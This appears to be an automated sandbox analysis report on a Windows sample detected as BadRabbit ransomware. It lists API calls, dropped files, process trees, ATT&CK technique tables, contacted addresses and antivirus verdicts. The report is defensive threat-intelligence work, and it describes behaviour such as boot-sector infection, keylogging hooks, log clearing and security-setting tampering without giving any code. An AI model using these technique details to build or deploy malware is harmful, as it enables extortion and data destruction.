          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF6FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,3_2_04BF6FFE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,3_2_04BF841D
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
          Source: C:\Windows\dispci.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\LogonUI.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
          Source: C:\Windows\System32\LogonUI.exe | Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF6FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,3_2_04BF6FFE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF8192 GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,3_2_04BF8192
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF57E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,3_2_04BF57E5
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF1531 GetVersion,3_2_04BF1531
          Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'

          Stealing of Sensitive Information

          Source: Yara match | File source: 19.0.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.2.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPE
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 11 Windows Management Instrumentation | 1 LSASS Driver | 1 LSASS Driver | 1 Disable or Modify Tools | 11 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
          Credentials | Domains | Default Accounts | 22 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 11 Input Capture | 22 Encrypted Channel | Exfiltration Over Bluetooth | 1 System Shutdown/Reboot
          Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Valid Accounts | 1 Valid Accounts | 1 DLL Side-Loading | Security Account Manager | 127 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 12 Service Execution | 22 Windows Service | 11 Access Token Manipulation | 1 File Deletion | NTDS | 1 Network Share Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Scheduled Task/Job | 22 Windows Service | 121 Masquerading | LSA Secrets | 261 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Bootkit | 112 Process Injection | 1 Valid Accounts | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Access Token Manipulation | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Bootkit | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
          Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 2 Indicator Removal | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
          Behavior Graph ID: 1481356 | Sample: LisectAVT_2403002C_35.exe | Startdate: 25/07/2024 | Architecture: WINDOWS | Score: 100
          Root (2): DNS/IP: time.windows.com; api.msn.com. Signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 10 other signatures. Started: LisectAVT_2403002C_35.exe (9); cmd.exe (12); svchost.exe (15); 15 other processes (17).
          LisectAVT_2403002C_35.exe (9): dropped C:\Windows\infpub.dat (data). Started: rundll32.exe (20); conhost.exe (25).
          cmd.exe (12): Drops executables to the windows directory (C:\Windows) and starts them. Started: dispci.exe (27); conhost.exe (29).
          svchost.exe (15): Changes security center settings (notifications, updates, antivirus, firewall).
          15 other processes (17): DNS/IP: 127.0.0.1 unknown unknown. Signature: Query firmware table information (likely to detect VMs).
          rundll32.exe (20): DNS/IP: 104.98.116.138, 443, 445, 49701 AKAMAI-ASN1EU United States; 192.168.2.0 unknown unknown; 192.168.2.1, 80 unknown unknown. Dropped: C:\Windows\dispci.exe (PE32); C:\Windows\cscc.dat (PE32+); C:\Windows\D99F.tmp (data). Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to enumerate network shares of other devices; Clears the journal log; 5 other signatures. Started: cmd.exe (31); cmd.exe (34); cmd.exe (36); 3 other processes (42).
          dispci.exe (27): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Contains functionality to infect the boot sector; Contains functionality to register a low level keyboard hook. Started: cmd.exe (38); conhost.exe (40).
          cmd.exe (31): Clears the journal log; Uses schtasks.exe or at.exe to add and modify task schedules. Started: conhost.exe (44); schtasks.exe (46).
          cmd.exe (34): Started: conhost.exe (48); 5 other processes (56).
          cmd.exe (36): Started: conhost.exe (50); schtasks.exe (52).
          cmd.exe (38): Started: 2 other processes (58).
          3 other processes (42): Started: conhost.exe (54); 4 other processes (60).
          Source | Detection | Scanner | Label | Link
          LisectAVT_2403002C_35.exe | 86% | ReversingLabs | Win32.Ransomware.BadRabbit |
          LisectAVT_2403002C_35.exe | 100% | Avira | HEUR/AGEN.1309921 |
          Source | Detection | Scanner | Label | Link
          C:\Windows\dispci.exe | 100% | Avira | TR/Diskcoder.12354 |
          C:\Windows\cscc.dat | 0% | ReversingLabs | |
          C:\Windows\dispci.exe | 96% | ReversingLabs | Win32.Ransomware.BadRabbit |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          http://ocsp.thawte.com0 | 0% | URL Reputation | safe |
          http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe |
          https://dev.virtualearth.net/REST/v1/Routes/Driving | 0% | Avira URL Cloud | safe |
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | 0% | Avira URL Cloud | safe |
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | 0% | Avira URL Cloud | safe |
          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/REST/v1/Routes/ | 0% | Avira URL Cloud | safe |
          https://dev.ditu.live.com/REST/v1/Routes/ | 0% | Avira URL Cloud | safe |
          https://dev.ditu.live.com/REST/v1/Transit/Stops/ | 0% | Avira URL Cloud | safe |
          http://diskcryptor.net/ | 0% | Avira URL Cloud | safe |
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/REST/v1/Routes/Walking | 0% | Avira URL Cloud | safe |
          https://g.live.com/odclientsettings/ProdV21C: | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | 0% | Avira URL Cloud | safe |
          http://crl.ver) | 0% | Avira URL Cloud | safe |
          https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/REST/v1/Locations | 0% | Avira URL Cloud | safe |
          https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/ | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/mapcontrol/logging.ashx | 0% | Avira URL Cloud | safe |
          https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | 0% | Avira URL Cloud | safe |
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | 0% | Avira URL Cloud | safe |
          http://standards.iso.org/iso/19770/-2/2009/schema.xsd | 0% | Avira URL Cloud | safe |
          https://dev.ditu.live.com/mapcontrol/logging.ashx | 0% | Avira URL Cloud | safe |
          http://192.168.2.1:80/ | 0% | Avira URL Cloud | safe |
          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | 0% | Avira URL Cloud | safe |
          https://g.live.com/odclientsettings/Prod1C: | 0% | Avira URL Cloud | safe |
          http://192.168.2.1/8. | 0% | Avira URL Cloud | safe |
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | 0% | Avira URL Cloud | safe |
          https://dynamic.t | 0% | Avira URL Cloud | safe |
          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | 0% | Avira URL Cloud | safe |
          http://www.bingmapsportal.comc | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/REST/v1/Routes/Transit | 0% | Avira URL Cloud | safe |
          https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | 0% | Avira URL Cloud | safe |
          http://192.168.2.1/ | 0% | Avira URL Cloud | safe |
          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | 0% | Avira URL Cloud | safe |
          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | 0% | Avira URL Cloud | safe |
          https://dev.ditu.live.com/REST/v1/Locations | 0% | Avira URL Cloud | safe |
          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | 0% | Avira URL Cloud | safe |
          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | 0% | Avira URL Cloud | safe |
          https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
time.windows.com | unknown | unknown | false | - | unknown
api.msn.com | unknown | unknown | false | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://diskcryptor.net/ | rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp, cscc.dat.3.dr, dispci.exe.3.dr | false | Avira URL Cloud: safe | unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000007.00000003.1364904828.000002C81BE5D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000007.00000002.1370673738.000002C81BE76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364010188.000002C81BE74000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | LisectAVT_2403002C_35.exe, cscc.dat.3.dr | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | svchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364865383.000002C81BE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 0000002A.00000003.1320828736.00000172154F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.dr | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 0000002A.00000002.2727131392.0000017215800000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://standards.iso.org/iso/19770/-2/2009/schema.xsd | regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.11.dr | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370617675.000002C81BE70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.168.2.1:80/ | rundll32.exe, 00000003.00000002.1324901443.00000000032CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.42.dr | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.168.2.1/8. | rundll32.exe, 00000003.00000002.1324901443.00000000032D2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | LisectAVT_2403002C_35.exe, cscc.dat.3.dr | false | URL Reputation: safe | unknown
https://dynamic.t | svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bingmapsportal.comc | svchost.exe, 00000007.00000002.1370159028.000002C81BE13000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.168.2.1/ | rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.98.116.138 | unknown | United States | 20940 | AKAMAI-ASN1EU | true
              IP
              192.168.2.0
              192.168.2.1
              127.0.0.1
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1481356
              Start date and time:2024-07-25 08:17:52 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 23s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:55
              Number of new started drivers analysed:2
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Sample name:LisectAVT_2403002C_35.exe
              Detection:MAL
              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@65/14@2/4
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 98
              • Number of non-executed functions: 130
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Connection to analysis system has been lost, crash info: Unknown
              • Exclude process from analysis (whitelisted): dllhost.exe, smss.exe, dwm.exe, csrss.exe, winlogon.exe, MoUsoCoreWorker.exe
              • Excluded IPs from analysis (whitelisted): 20.101.57.9, 184.28.90.27, 104.73.229.116, 204.79.197.203, 23.216.207.31, 2.23.209.141, 2.23.209.150, 2.23.209.154, 2.23.209.156, 2.23.209.142, 2.23.209.143, 2.23.209.144, 2.23.209.149, 2.23.209.153, 40.126.31.71, 20.190.159.68, 20.190.159.75, 20.190.159.0, 40.126.31.69, 20.190.159.64, 20.190.159.23, 20.190.159.4, 93.184.221.240, 2.23.209.176, 2.23.209.173, 2.23.209.179, 2.23.209.180, 2.23.209.178, 2.23.209.175, 2.23.209.181, 2.23.209.182, 2.23.209.177, 40.68.123.157, 20.3.187.198, 204.79.197.239, 13.107.21.239, 142.250.184.206, 52.165.165.26, 20.166.126.56, 20.242.39.171
